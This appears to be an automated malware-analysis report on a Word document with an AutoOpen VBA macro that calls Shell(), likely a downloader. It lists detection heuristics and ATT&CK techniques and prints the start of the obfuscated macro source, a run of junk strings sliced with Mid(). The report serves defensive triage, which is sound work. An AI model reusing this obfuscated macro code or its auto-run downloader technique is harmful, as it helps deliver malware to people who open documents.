Verdict: MALICIOUS
Risk Score: 244
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, which is a common technique for malicious documents. The macro utilizes a Shell() call, indicating an attempt to execute external commands. This strongly suggests the document is designed to download and execute a secondary payload, aligning with the characteristics of a macro-based downloader.
Heuristics (8)
- ClamAV: Doc.Macro.Obfuscation-6355576-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 50761 bytes |

SHA-256: 922b18e247b353204a6bb450c4305dcb83526aff1b2552b99d415952f3974b6d

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 88 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function WEiJojnzb()
DCcvOTtuYZ = "1R02TUCOIXJWOAcvkUdfWBdOoNMJWiPPuGljmbZJhdBNQOhfoXmYizWqRiMQhjMJzLZnPtJJuUwtAPwafjUwvrkukuRHOJbAQrQFpuQvNddKBdqCjmlALNNFbiDUcBulszcIwsllQZkSNZtGEObcXaoDiLdLqvSMjsSDBhDnAAkmcvsBkwPNZSNSJYinPauUHYiVHpFXLocXqCaiTcatjFmRiAucCQYZGPiEMWuursClqqbGwvUmAAoBlRrHvdUuQCRaXWWwifCnDBbnYniHwlZFbdSufmz2QF"
LWFvDaJ = Mid(DCcvOTtuYZ, 14, 274)
zzzLzKCt = LWFvDaJ
GqdlLZTzRn = "1EBUCU45OVW1NDQ4VSZ8KNazztEGMuZDAzSkIRcUaLWtUJIQBbFrINzDvHVjYEKsnswtzbkoJCTp773"
suAXUaoMmiC = Mid(GqdlLZTzRn, 23, 54)
MJPRVriBYOp = suAXUaoMmiC
ZXXBX = "Q5G4P9JJA72YC5IQFPP9GDMDrspDrsjhPjFzDYbDNpIMotHnXVGI4QBE7JGOT3U"
nFbEqwhvoo = Mid(ZXXBX, 25, 24)
NiwRqoPinZ = nFbEqwhvoo
mhWjRTuNp = "5XA5LRPZJARENUNHjNAKqzFOlqWANSBpEWwREADBwJIhJtXqctsGjNKLPqSwjWcHbrPizvCjKzMhoXFsTfXTavGqLlCOhERbjAGSiothqX001I9DELLYE1ZXADSS8"
mRfGjw = Mid(mhWjRTuNp, 15, 91)
TpwRAOd = mRfGjw
KXDcabSzH = "8FNKAY7EVDSL9FKzNitDnNHFFYtMkRwizGZnlSzlmlUukzzmMETCjrlhLlzTZJrSKHNEHWOvjIRBtNVHbHzfztwIUsbzUfLcuBjcksiqqXTbZjnwQprSKLUQJFjPuOaDwpHrdsXjdIpaaWikEdjfntRjhTTfIPwczPfjcwVXRIoBVuqmWwKRfuQCXYKJZsaOMMcLrzIIHLNfFPNmdjIJFizCzcLEmLwZhaoIRiuXqCKUhkzRWX"
TmSsTVhIKA = Mid(KXDcabSzH, 15, 225)
YAEMik = TmSsTVhIKA
lXwQvrsT = "L2W4EPLTEVR5TEQtkznPAIGaaETUwScFZTmMjVGnBwYsmbaCQjYTUCimlwwqVIBcGoWloDMOrzNEjOowiREPtJkXkAbiZPRtuvmzFpNMWKbUoiCXJzMEEmizDwBociobhUJobMMJZ54NAKLB"
VNNlZ = Mid(lXwQvrsT, 15, 119)
iXwjiGSVz = VNNlZ
kdkFIuu = "MFVQ9VJXFWcVOiEtPiFpQRGsrTfkmjOHsmTjGCiHwwGNnFwljJFQHziNULdiGAjWFVccKXnMwwqRLsFlWtBcJE"
tspiaRwQTCB = Mid(kdkFIuu, 11, 74)
BZpIva = tspiaRwQTCB
KVaUnAtO = "3IMZIwkBdWrlafEzIhjkYXMsoBFhkAoRmOilqcRzWohOLcHZNcXTZhFRhoCHqCRdiawMASJjQhOjpzhMufUHdUrFINEBaKIUXEjldvZuTrCsTWbjHqMLhMVI3BN7SM3"
rjPKoc = Mid(KVaUnAtO, 5, 113)
hmiWAi = rjPKoc
GTPiizt = "F48M0QAGO0WZdXEmKEsHVwiLqNckpAcUjYAIUFEoGWpadhTEt10"
RoMuDfRfaXj = Mid(GTPiizt, 11, 39)
baVEzIa = RoMuDfRfaXj
EPEzR = "NRLT6MYFMPLIY9D9ZB1HKXjtjRJiPaLPnDVvMowiaEUwllTCUGOWWW9OEHDKYLNDX4"
BCHazsVzGR = Mid(EPEzR, 20, 30)
EjjMUu = BCHazsVzGR
wvaunDUNjwp = "25ZQRFKUZSMHFPOYHUnZBjbZXEUwAwkqDjHwNwfcLwuDbRvfoPvjnOWEChYjFHaiiDbDsPLIpLNCoYzGJoKlDDDpMDwfazXEXQUXpsnYDnrbATPikSXQzoafAmqpTjiqoJfYDZRQBliQMcptnRvIcGHjppXDCwFXEBmqorbKBGPLGKSXwwBBkaOhBwiNBOOCfKLLpwEvqkHVrvciWAGFwEmimFpsN4GSK4G2MDGLU9ZRFL3F3UN"
RGbLO = Mid(wvaunDUNjwp, 15, 206)
TlwZOw = RGbLO
bUpDDCLmq = "9038ZU2OTOM68JYF3M7U1N538QYS1HCSINInsMjwzHiwrGKASsqGTEqBHIGbXjYkJMndbUciPffPRHNqtmLuOiYEWHfjGEYSjwofShYwPMqnYbjAuQikViWanjGUptYLGNfTShXLONiBskfvXioqVowFcOrjbDJWofjLvQhNsWWIzUiCDKzKEhpSQZrEpokLDHNMDUzGzbzzSoFHfpfQFzSGqOu5ET04RN"
UwMDV = Mid(bUpDDCLmq, 33, 187)
XvmssNwtr = UwMDV
NXwMYlDzzc = "CXWWG0VUQZksVAJDEC6G5LK97VM9UVR7"
iIjSuiAYDOq = Mid(NXwMYlDzzc, 10, 5)
rHNZhdMChBP = iIjSuiAYDOq
XTIZWZEEKMW = "A35L2AEKmzzYTnSXwUztudHaNYjDiuDGWptboGHXZAdifcEDXLtarhcjRSXsIitrvtBiuqisMaTuNSKIWE"
mZMjscn = Mid(XTIZWZEEKMW, 9, 68)
EdwSi = mZMjscn
vVQfUOsuWqr = "I6H839QECEJUhoTwitfzimukLEWJLzMsqWnHVLjijNczadNnwFcaZLmFKncvijiGSRdLFN3T7XBCL4"
wVzHu = Mid(vVQfUOsuWqr, 11, 58)
HWvwnDrhPfR = wVzHu
NcpmVZPhOUI = "PGozEttFf6ZU68GZDW8PG8BUCWB69NFVAD9O"
JAKHjFMYwF = Mid(NcpmVZPhOUI, 3, 7)
NlRQjq = JAKHjFMYwF
kLavOq = "TVVD0AMcXMzRVJzJiqiLGXlSfkizXE5B95"
wHbOzIPbAD = Mid(kLavOq, 6, 23)
jrMuLY = wHbOzIPbAD
RWEAA = "UGNS5WFIFQCiilzzfViJzCmmcFOcuQwMduFzXbjhwwaSPuoazTpnSAiovZdRWqlTlkFnjAZDmzLBbTWiQniabItdMRDzwRKHNHhipBuztmBVojMcCvBjMKsdqbaPwbFUnDnTmrtOtjjpGYojEbvDPbvCPDoNbfASjhiksspKBnqfiDWSmuKVjCEMIlEiDjnNjOIZpEnMlkBclPYMjWajVildcWcHoGHVzcwQuzciHwjwAbatNrCjFGsBciwTbjYfcjcIQHRjusZWvpcAvjtwEaCHCF"
ZPYwKswqABm = Mid(RWEAA, 12, 267)
nkiiUklP = ZPYwKswqABm
zaroQ = "0IVBB02JWOQJQ3DQGhdqlnElohvmzOoAwtvVBdGcLOQarRiGuKwNifzkAZDFwLvlmjsPGzodbAfWXduXzpsnSaWRvKVbZAfzTfoHZTzzWTmdzbNWfjGHTHSLNbTwbMDaVfCspmwjpvRwosRUzzwtuXjLMctwzDVJQLHTYUjsiaSXqUXVJ ... (truncated)
```